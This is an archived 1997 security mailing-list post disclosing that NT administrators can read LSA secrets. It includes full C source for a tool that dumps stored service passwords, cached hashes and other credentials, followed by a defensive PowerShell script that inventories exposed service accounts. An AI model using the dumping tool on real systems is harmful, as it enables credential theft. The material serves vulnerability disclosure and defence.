NT LSA secrets
Description: This program allows you to obtain various LSA secrets such as service passwords, cached password hashes of recent users, and a bunch of others.
Author: Paul Ashton <paul@ARGO.DEMON.CO.UK>
Compromise: The administrator (or someone who has hacked admin) of an NT box can find a lot of juicy information which M$ tried to hide.
Vulnerable Systems: Presumably just NT (4.0, maybe 3.51) boxes.
Date: 9 August 1997
Date: Sat, 9 Aug 1997 20:06:38 +0100
From: Paul Ashton <paul@ARGO.DEMON.CO.UK>
To: NTBUGTRAQ@RC.ON.CA
Subject: LSA secrets
Following on from the service password issue I raised some time ago,
here's a little program that will dump various LSA secrets such
as service passwords (plain text), cached password hashes of the
last users to login to a machine, FTP, WEB, etc. plaintext
passwords, RAS dial up account names, passwords etc, workstation
passwords for domain access, etc.
Run as: prog _sc_schedule [machine], prog nl$1, prog w3_root_data
or any other registry key under NTLM\security\policy\secrets.
The moral? If only Microsoft would document just 10% of the
APIs, maybe people wouldn't make an issue of these things.
NOTE: THIS HAS TO BE RUN AS AN ADMINISTRATOR, OK?!
Cheers
Paul
ps. Sorry about the coding, but win32 programming is so tedious.
/* Build with a Win32 compiler and link against advapi32.lib */
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <io.h>
#include <ntsecapi.h>

/* Abort with the failing line number if a call does not succeed */
#define AST(x) if (!(x)) { printf("Failed line %d\n", __LINE__); exit(1); } else

/* Wrap a NUL-terminated wide string in the counted-string form LSA expects.
   Uses one static buffer, so each result must be consumed before the next call. */
PLSA_UNICODE_STRING
str(LPWSTR x)
{
    static LSA_UNICODE_STRING s;
    s.Buffer = x;
    s.Length = (USHORT)(wcslen(x) * sizeof(WCHAR));
    s.MaximumLength = (USHORT)((wcslen(x) + 1) * sizeof(WCHAR));
    return &s;
}

int _cdecl
main(int argc, char *argv[])
{
    LSA_HANDLE pol;
    PLSA_UNICODE_STRING foo;
    LSA_OBJECT_ATTRIBUTES attrs;
    WCHAR keyname[256] = L"";
    WCHAR host[256] = L"";

    if (argc < 2 || argc > 3) {
        fprintf(stderr, "usage: %s secretname [machine]\n", argv[0]);
        return 1;
    }
    /* %hs converts the ANSI argv strings into the wide strings LSA wants */
    wsprintfW(keyname, L"%hs", argv[1]);
    if (argc == 3) wsprintfW(host, L"%hs", argv[2]);

    memset(&attrs, 0, sizeof(attrs));
    /* No machine argument means the local machine (NULL system name) */
    AST(!LsaOpenPolicy(argc == 3 ? str(host) : NULL, &attrs, 0, &pol));
    AST(!LsaRetrievePrivateData(pol, str(keyname), &foo));

    /* The secret comes back as raw UTF-16; write it byte-for-byte to stdout */
    _write(1, foo->Buffer, foo->Length);

    LsaFreeMemory(foo);
    LsaClose(pol);
    return 0;
}
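The _SC_<service> secrets the post dumps exist only for services that log on with a real account, so the defensive counterpart is an inventory of which services on a box keep a password in LSA at all. The following PowerShell is an added example for that, not part of Paul Ashton's post; it assumes the current Windows service model (LocalSystem, LocalService, NetworkService, virtual "NT SERVICE\" accounts and managed service accounts ending in "$" store no password of their own).

```powershell
# Added example: list services whose logon password is held as an LSA secret
# (named _SC_<ServiceName>, as in the post's "_sc_schedule" case).
function Get-ServiceStoredCredentials {
    param([string]$ComputerName = $env:COMPUTERNAME)

    # Built-in accounts have no stored password and are not of interest here.
    $builtin = @('LocalSystem',
                 'NT AUTHORITY\LocalService',
                 'NT AUTHORITY\NetworkService')

    Get-CimInstance -ClassName Win32_Service -ComputerName $ComputerName |
        Where-Object {
            $_.StartName -and
            ($builtin -notcontains $_.StartName) -and
            ($_.StartName -notlike 'NT SERVICE\*') -and   # virtual accounts
            ($_.StartName -notlike '*$')                   # (g)MSA accounts
        } |
        ForEach-Object {
            [pscustomobject]@{
                Service    = $_.Name
                Account    = $_.StartName
                StartMode  = $_.StartMode
                SecretName = "_SC_$($_.Name)"   # where the SCM keeps the password
            }
        }
}

# Every row is an account whose plaintext password a local admin could recover;
# each one is a candidate for a managed service account or a virtual account.
Get-ServiceStoredCredentials | Sort-Object Account | Format-Table -AutoSize
```

Run it as an administrator on each host; an empty result means no service password is recoverable the way the post describes.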
This page is part of Fyodor's exploit world.